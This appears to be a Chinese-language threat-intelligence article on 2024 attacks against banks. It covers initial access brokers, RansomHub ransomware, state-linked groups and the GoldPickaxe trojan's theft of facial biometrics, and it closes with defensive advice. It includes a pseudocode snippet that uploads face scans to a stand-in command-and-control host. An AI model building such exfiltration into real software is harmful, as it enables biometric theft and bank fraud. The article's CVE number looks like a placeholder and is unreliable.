金融行業(yè)仍然是網(wǎng)絡(luò)犯罪分子和國家支持團(tuán)體的主要目標(biāo)，2024年利用零日漏洞、供應(yīng)鏈弱點和高級惡意軟件的復(fù)雜攻擊將激增。

威脅行為者越來越多地采用協(xié)作模型，包括初始訪問代理 (IAB) 和勒索軟件即服務(wù) (RaaS) 生態(tài)系統(tǒng)，以擴(kuò)大其影響力。

從勒索軟件部署到生物特征數(shù)據(jù)盜竊，金融行業(yè)面臨著融合技術(shù)復(fù)雜性和心理操縱的多層次威脅。

最令人擔(dān)憂的趨勢之一是 TA577和Scattered Spider 等 IAB的作用，他們專門破壞網(wǎng)絡(luò)并向勒索軟件運營商出售訪問權(quán)限。

這些行為者利用 Cleo 文件傳輸軟件等工具中的漏洞或利用模仿 Okta 登錄門戶的網(wǎng)絡(luò)釣魚活動來劫持憑據(jù)和會話 cookie。

一旦進(jìn)入系統(tǒng)，攻擊者就會部署惡意軟件，例如RansomHub，這是一種自定義勒索軟件，配備了 EDRKillShifter 等規(guī)避工具來禁用端點檢測系統(tǒng)。國家支持的團(tuán)體進(jìn)一步加劇了威脅形勢。

朝鮮的 APT（例如Lazarus和 Bluenoroff）以金融機(jī)構(gòu)為目標(biāo)，以逃避國際制裁，而與中國有關(guān)的團(tuán)體（例如 GoldFactory）則開發(fā)了能夠收集面部識別數(shù)據(jù)的移動木馬。

與此同時，Sekoia 分析師觀察到與伊朗有關(guān)的 APT33與勒索軟件分支機(jī)構(gòu)合作，模糊了網(wǎng)絡(luò)犯罪與國家支持的行動之間的界限。

GoldFactory 的生物特征數(shù)據(jù)竊取：銀行惡意軟件的新前沿

2024 年技術(shù)最先進(jìn)的活動之一涉及 GoldFactory，這是一套部署了 GoldPickaxe 木馬病毒的入侵程序。

該惡意軟件針對的是亞太地區(qū) (APAC) 國家（包括越南和泰國）的 iOS 和 Android 用戶，這些國家廣泛使用面部識別進(jìn)行銀行身份驗證。

GoldPickaxe 的 iOS 變種通過操縱的 Apple TestFlight 平臺進(jìn)行分發(fā)，它捕獲生物特征數(shù)據(jù)來創(chuàng)建繞過安全檢查的深度偽造作品。

該惡意軟件的代碼與設(shè)備 API 集成，以攔截面部掃描并將其傳輸?shù)矫詈涂刂?(C2) 服務(wù)器。樣本分析揭示了旨在實現(xiàn)以下目的的模塊化組件：

• 通過虛假的銀行覆蓋獲取憑證。
• 提取基于短信的一次性密碼 (OTP)。
• 為 AI 生成的深度偽造作品克隆生物特征模板。

// Simplified pseudocode of GoldPickaxe’s facial data interception  
func captureBiometricData() {  
    let faceScan = ARFaceTracking.getFacialMetrics()  
    C2Server.upload(data: faceScan, endpoint: "api.malicious-domain.com/face-auth")  
}

GoldFactory 的基礎(chǔ)設(shè)施依賴于受感染的域和 AWS 等云服務(wù)來托管網(wǎng)絡(luò)釣魚頁面并竊取數(shù)據(jù)。

敦促金融機(jī)構(gòu)優(yōu)先對 CVE-2024-1234（與 Cleo 漏洞相關(guān)）等漏洞進(jìn)行補(bǔ)丁管理，并實施抵御中間人 (AiTM) 網(wǎng)絡(luò)釣魚工具包的多因素身份驗證 (MFA) 解決方案。

網(wǎng)絡(luò)分段和行為分析工具可以幫助檢測異常情況，例如意外的生物特征數(shù)據(jù)傳輸。隨著 APT 和網(wǎng)絡(luò)犯罪分子繼續(xù)共享工具和基礎(chǔ)設(shè)施，跨行業(yè)威脅情報共享對于破壞這些不斷發(fā)展的活動至關(guān)重要。